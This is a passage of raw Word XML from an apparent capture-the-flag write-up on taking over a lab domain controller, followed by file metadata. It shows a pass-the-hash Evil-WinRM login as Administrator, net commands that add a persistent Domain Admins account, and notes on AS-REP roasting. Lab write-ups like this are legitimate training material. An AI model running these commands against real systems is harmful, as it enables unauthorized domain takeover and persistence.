      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0092417D">
        <w:t>svc_loanmgr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0092417D">
        <w:t>:'</w:t>
      </w:r>
      <w:r>
        <w:t>[PW]</w:t>
      </w:r>
      <w:r w:rsidRPr="0092417D">
        <w:t>'@10.129.10.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7422E" w14:textId="463E2FBB" w:rsidR="0092417D" w:rsidRDefault="007C113B" w:rsidP="0092417D">
      <w:r>
        <w:t xml:space="preserve">Now that I have the administrator hash, I used </w:t>
      </w:r>
      <w:r w:rsidR="001E48F3">
        <w:t>Evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E48F3">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to get back into the DC as the domain admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E4BCAC" w14:textId="7AB1E925" w:rsidR="007C113B" w:rsidRDefault="00FC25AB" w:rsidP="007C113B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E7E7C" w:rsidRPr="007E7E7C">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007E7E7C" w:rsidRPr="007E7E7C">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E7E7C" w:rsidRPr="007E7E7C">
        <w:t xml:space="preserve"> 10.129.10.103 -u Administrator -H</w:t>
      </w:r>
      <w:r w:rsidR="007E7E7C">
        <w:t xml:space="preserve"> [hash]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B5E2B3" w14:textId="519433B3" w:rsidR="007E7E7C" w:rsidRDefault="007E7E7C" w:rsidP="007E7E7C">
      <w:r>
        <w:t xml:space="preserve">I then navigated to the desktop and captured the flag. </w:t>
      </w:r>
      <w:r w:rsidR="00DC27C6">
        <w:t>To demonstrate full domain compromise and persistence, I created a new domain administrator account</w:t>
      </w:r>
      <w:r w:rsidR="00805389">
        <w:t>. On the DC, I ran</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7B7E53" w14:textId="7FDCE715" w:rsidR="00805389" w:rsidRDefault="00173E3E" w:rsidP="00805389">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00173E3E">
        <w:t xml:space="preserve">net user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173E3E">
        <w:t>zach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173E3E">
        <w:t xml:space="preserve"> abcd.1234! /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00173E3E">
        <w:t>add</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A4DC413" w14:textId="60B71904" w:rsidR="00173E3E" w:rsidRDefault="00173E3E" w:rsidP="00805389">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00173E3E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">net group "Domain Admins" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173E3E">
        <w:t>zach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173E3E">
        <w:t xml:space="preserve"> /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A352A7" w14:textId="37FB484A" w:rsidR="00173E3E" w:rsidRDefault="00D55BB6" w:rsidP="00173E3E">
      <w:r>
        <w:t xml:space="preserve">This created an account named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that is a domain admin. Again, I used </w:t>
      </w:r>
      <w:r w:rsidR="001E48F3">
        <w:t>Evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E48F3">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to gain access to the DC and prove that I was a domain admin. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22240167" w14:textId="77777777" w:rsidR="00D55BB6" w:rsidRDefault="00D55BB6" w:rsidP="00173E3E"/>
    <w:p w14:paraId="45D0EAB4" w14:textId="19971EAF" w:rsidR="00D55BB6" w:rsidRDefault="00D55BB6" w:rsidP="00173E3E">
      <w:r>
        <w:t>Final Thoughts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3E7F1C" w14:textId="5CD51D9E" w:rsidR="00D55BB6" w:rsidRPr="00D55BB6" w:rsidRDefault="00D55BB6" w:rsidP="00173E3E">
      <w:r>
        <w:t xml:space="preserve">Overall, the initial foothold was the same as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Forest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007735D6">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="001517DB">
        <w:t>attern recognition is s</w:t>
      </w:r>
      <w:r w:rsidR="001013EE">
        <w:t xml:space="preserve">tarting to click, especially recognizing when </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001013EE">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001013EE">
        <w:t xml:space="preserve"> and AS-REP roasting can be reused across similar environments.</w:t>
      </w:r>
      <w:r w:rsidR="00E914E0">
        <w:t xml:space="preserve"> I quickly realized that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E914E0">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E914E0">
        <w:t xml:space="preserve"> and AS-REP roasting were viable paths based on patterns from previous machines. </w:t>
      </w:r>
      <w:r w:rsidR="00A20216">
        <w:t xml:space="preserve">This was a fun box and I’m looking forward to continuing </w:t>
      </w:r>
      <w:r w:rsidR="00367E1D">
        <w:t>to improve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC68D9" w14:textId="77777777" w:rsidR="00C70B0D" w:rsidRPr="00514D3C" w:rsidRDefault="00C70B0D" w:rsidP="00A227CD"/>
    <w:sectPr w:rsidR="00C70B0D" w:rsidRPr="0051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D2"/>
    <w:rsid w:val="000167B7"/>
    <w:rsid w:val="001013EE"/>
    <w:rsid w:val="00101465"/>
    <w:rsid w:val="00122D20"/>
    <w:rsid w:val="0014450C"/>
    <w:rsid w:val="001517DB"/>
    <w:rsid w:val="00173E3E"/>
    <w:rsid w:val="00191949"/>
    <w:rsid w:val="001B2EEA"/>
    <w:rsid w:val="001B777C"/>
    <w:rsid w:val="001E48F3"/>
    <w:rsid w:val="002132C8"/>
    <w:rsid w:val="0024417D"/>
    <w:rsid w:val="002679A3"/>
    <w:rsid w:val="00285D9E"/>
    <w:rsid w:val="002C1A18"/>
    <w:rsid w:val="002E0351"/>
    <w:rsid w:val="00301D5A"/>
    <w:rsid w:val="00311BE0"/>
    <w:rsid w:val="00326DF6"/>
    <w:rsid w:val="00367E1D"/>
    <w:rsid w:val="0037036E"/>
    <w:rsid w:val="00377AC9"/>
    <w:rsid w:val="003F4EDE"/>
    <w:rsid w:val="00436FA6"/>
    <w:rsid w:val="004522B2"/>
    <w:rsid w:val="00481784"/>
    <w:rsid w:val="00484AF8"/>
    <w:rsid w:val="00484CAF"/>
    <w:rsid w:val="004B4D9B"/>
    <w:rsid w:val="004B6BD9"/>
    <w:rsid w:val="004D317B"/>
    <w:rsid w:val="004D7D58"/>
    <w:rsid w:val="005027DD"/>
    <w:rsid w:val="0051252C"/>
    <w:rsid w:val="00514D3C"/>
    <w:rsid w:val="005163C6"/>
    <w:rsid w:val="005548C4"/>
    <w:rsid w:val="00575CF0"/>
    <w:rsid w:val="005A1AB7"/>
    <w:rsid w:val="005C2EAC"/>
    <w:rsid w:val="00617FA0"/>
    <w:rsid w:val="00630839"/>
    <w:rsid w:val="00655425"/>
    <w:rsid w:val="00675D65"/>
    <w:rsid w:val="00690D87"/>
    <w:rsid w:val="00694402"/>
    <w:rsid w:val="00723FC1"/>
    <w:rsid w:val="00727B30"/>
    <w:rsid w:val="00747405"/>
    <w:rsid w:val="007735D6"/>
    <w:rsid w:val="007A7CCC"/>
    <w:rsid w:val="007C113B"/>
    <w:rsid w:val="007D5FBD"/>
    <w:rsid w:val="007E7E7C"/>
    <w:rsid w:val="00805389"/>
    <w:rsid w:val="00832552"/>
    <w:rsid w:val="00847BF7"/>
    <w:rsid w:val="008C1897"/>
    <w:rsid w:val="008D043F"/>
    <w:rsid w:val="008E3FB2"/>
    <w:rsid w:val="008F5433"/>
    <w:rsid w:val="0092417D"/>
    <w:rsid w:val="00944B4D"/>
    <w:rsid w:val="009A3514"/>
    <w:rsid w:val="009F6198"/>
    <w:rsid w:val="00A20216"/>
    <w:rsid w:val="00A227CD"/>
    <w:rsid w:val="00A231DB"/>
    <w:rsid w:val="00A51150"/>
    <w:rsid w:val="00B17FD2"/>
    <w:rsid w:val="00B30B6B"/>
    <w:rsid w:val="00B3418F"/>
    <w:rsid w:val="00BC2509"/>
    <w:rsid w:val="00C17417"/>
    <w:rsid w:val="00C34E1B"/>
    <w:rsid w:val="00C42420"/>
    <w:rsid w:val="00C61245"/>
    <w:rsid w:val="00C70B0D"/>
    <w:rsid w:val="00C73D58"/>
    <w:rsid w:val="00C82D1F"/>
    <w:rsid w:val="00CB6B56"/>
    <w:rsid w:val="00D255C6"/>
    <w:rsid w:val="00D2655F"/>
    <w:rsid w:val="00D55BB6"/>
    <w:rsid w:val="00DC27C6"/>
    <w:rsid w:val="00E0344A"/>
    <w:rsid w:val="00E36711"/>
    <w:rsid w:val="00E7145D"/>
    <w:rsid w:val="00E914E0"/>
    <w:rsid w:val="00F31984"/>
    <w:rsid w:val="00F70709"/>
    <w:rsid w:val="00F86745"/>
    <w:rsid w:val="00FC25AB"/>
    <w:rsid w:val="00FE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FC5FA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E4FE5B06-CCF9-A449-90DD-8483545F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0.10.15.101/SharpH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1113</Words>
  <Characters>5401</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>101</Lines>
  <Paragraphs>55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Davis</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Zachariah Davis</cp:lastModifiedBy>
  <cp:revision>93</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-11T21:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-12T15:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>